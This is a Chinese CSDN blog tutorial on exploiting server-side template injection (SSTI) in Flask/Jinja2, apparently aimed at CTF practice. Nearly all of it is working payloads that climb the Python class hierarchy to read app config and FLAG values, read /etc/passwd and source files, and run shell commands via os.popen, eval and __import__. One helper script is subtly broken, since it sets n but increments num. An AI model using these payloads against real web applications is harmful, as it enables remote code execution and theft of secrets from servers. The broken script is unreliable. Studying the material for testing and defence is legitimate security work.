【SSTI模块注入】SSTI+Flask+Python(中):漏洞利用

已于 2022-07-25 09:24:59 修改
阅读量902 收藏 6
点赞数 2
文章标签: python flask web安全
于 2022-07-25 09:24:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125963088
版权

目录

一、利用思路

二、针对性利用

2.1、获取基础信息:

config:

self:

""、[]、()

更多

2.2、获取基类

2.3、读写文件

第一步:

第二步:

第三步:

第四步:

2.4、命令执行:

第一步:

第二步:

三、示例:

3.1、payload

第一个{%  %}

第二个{%  %}

第三个{%  %}

一、利用思路

1、获取内置类所对应的类

__class__

2、获得object基类

__bases__

3、获取子类列表

__subclasses__()

4、在子类中寻找可利用的类(函数)

二、针对性利用

2.1、获取基础信息:

config:

{{config}}:可以获取当前设置

self:

{{self}} ⇒ <TemplateReference None>

{{self.__dict__._TemplateReference__context.config}}

""、[]、()

配合__class__.__mro__[2]这样找到object类

{{[].__class__.__base__.__subclasses__()[68].__init__.__globals__['os'].__dict__.environ['FLAG']}}

更多

url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config等

如果config,self不能使用,要获取配置信息,就必须从它的上部全局变量(访问配置current_app等)

{{url_for.__globals__['current_app'].config.FLAG}}

{{get_flashed_messages.__globals__['current_app'].config.FLAG}}

{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}

2.2、获取基类

''.__class__.__mro__[2]        #python2.7

''.__.class__.__mro__[1]        #python3.7

{}.__class__.__bases__[0]

().__class__.__bases__[0]

[].__class__.__bases__[0]

request.__class__.__mro__[1]

2.3、读写文件

第一步:

''.__class__

<class 'str'>#获取''字符串的所属对象

第二步:

''.__class__.__mro__

(<class 'str'>, <class 'object'>)#获取str类的父类

第三步:

''.__class__.__mro__[1].__subclasses__()

<……>#获取object类的所有子类

第四步:

''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()

[].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()

读是read(),写是write()

类中寻找类,用数组下标获取,然执行类中函数(第41个类是file类)

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()    

读文件read() 可改为 写文件write() 

python3没有file

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__[%27open%27](%27/etc/passwd%27).read()}}

2.4、命令执行:

第一步:

通过脚本找到包含os模块的类

n = 0
for i in 'str'.__class__.__mro__[1].__subclasses__():
#str处根据自己实际填
    try:
         if 'os' in i.__init__.__globals__:
             print (num,i)
         num+=1
    except:
        print ('-')
        num+=1

输出了编号为n的类

第二步:

构造paylad

''.__class__.__mro__[1].__subclasses__()[n].__init__.__globals__['os'].system('ls')#列出本级目录

''.__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.') #读取本级目录

下面如果有os类,直接执行命令

[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()

下面如果有eval,__import__等全局函数,进行执行命令

[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")

————————————————————
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")

————————————————————
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()

————————————————————
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()

三、示例:

3.1、payload

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

第一个{%  %}

[].__class__#返回的是[]的类型list为列表

list.__base__#返回list的一个父类为object是所有类的基类所有类都是继承自object

object.__subclasses__()#返回object的所有子类所有继承自object的类

第二个{%  %}

循环遍历类寻找catch_warnings这个类进入该类

第三个{%  %}

c.__init__#表示c类中的init这个内置方法

__init__.__globals__['__builtins__']#返回init这个方法可以使用的类、方法、以及属性当中的__builtins__

__builtins__#表示内建方法因为这里所使用的open是一个内建方法利用open打开源码调用read读取

黑色地带(崛起)
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ssti--flask模块
m0_67467924的博客
05-29 273
构造payload:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()模板的作用是使用静态的页面html展示动态的内容。模板其实是一个响应文本的文件,其变量表示动态部分,告诉模板引擎具体的值需要从使用的数据获取,使用真实值替换变量,得到字符串的过程被称为渲染。可以使用如下模块控制语句查找,子类的初始化方法的全局变量里是否存在os,如果有os,就返回当前模板列表的下标。
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5418
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
SSTI模板注入基础(Flask+Jinja2)
qq_55202378的博客
12-22 872
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。由于python一切皆对象的特性,函数本质上也是对象,也存在类的一些内置方法和内置属性,所以我们可以执行接下来的操作。是类的一个内置属性,值是该实例的对应的类。
SSTI漏洞详解
最新发布
2301_80661529的博客
03-20 1510
SSTI(Server-Side Template Injection)就是服务器端模板注入。利用该漏洞可用于直接攻击web服务器的内部。1.Smarty:Smarty是PHP语言广泛使用的模板引擎,它提供了强大的模板分离和逻辑控制功能。2.Twig:Twig是一个现代化的PHP模板引擎,被广泛用于Symfony框架等PHP应用程序。3.Blade:Blade是Laravel框架的默认模板引擎,它提供了简洁的语法和强大的模板继承特性。
Flask(Jinja2)服务端模板注入漏洞(SSTI)整理
qq_46145027的博客
04-19 1255
整理一下Flask框架下的SSTI漏洞相关知识
python 先知论坛_用python继承链搞事情
weixin_32807673的博客
12-24 174
Author:cl0und@Syclover前言继承链这个这个词是我自己发明的。看到有的师傅博客将它称为egg或者ssti,但是我喜欢叫它继承链因为感觉很生动。最早遇到这种姿势是在学习python bypass沙盒的时候。当时不是很理解形如().__class__.__bases__[0].__subclasses__()的意思。学习一段时间后,我决定来总结一下构造继承链的方法,并且用此方法在d...
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入漏洞可能使网站遭受各种攻击,具体取决于所讨论的模板引擎以及应用程序使用它的方式。 在某些罕见情况下,这些漏洞不会带来真正的安全风险。 但是,在大多数情况下,服务器端模板注入的影响可能是...
Blind_SPOT:盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入SSTI
05-30
盲点盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入SSTI要求 :- Python3 请求和 colorama 库用法 :- -u ===>目标网址在您的注入区域或参数添加 [*] -p payload_list ,有 r zahir009 ...
flaskssti:测试SSTI
02-21
烧瓶
Flask SSTI/沙箱逃逸的一些总结
01-20
​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期...
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web...
tplmap:服务器端模板注入和代码注入检测与开发工具
05-03
Tplmap通过许多沙箱转义技术来帮助利用代码注入和服务器端模板注入漏洞来访问底层操作系统。 开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自...
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
White-box-pentesting:创建此实验室的目的是演示哈希传递,盲SQL和SSTI漏洞
05-10
从而导致哈希和管理员帐户被接管admin at search选项SSTI漏洞会导致RCE你的目标进行源代码审查以查找以下漏洞并登录到管理员帐户。 并获得反向外壳。 您可以通过电子邮件将您的发现和脚本的演练通过电子邮件发送...
SSTI漏洞基础解析
小王的储物间
02-14 511
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
SSTI模板注入
weixin_42739903的博客
01-10 1402
SSTI 漏洞介绍和一些题目案例演示
python模板注入_SSTI模板注入
weixin_35186171的博客
02-10 799
SSTI是个啥?SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理...
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值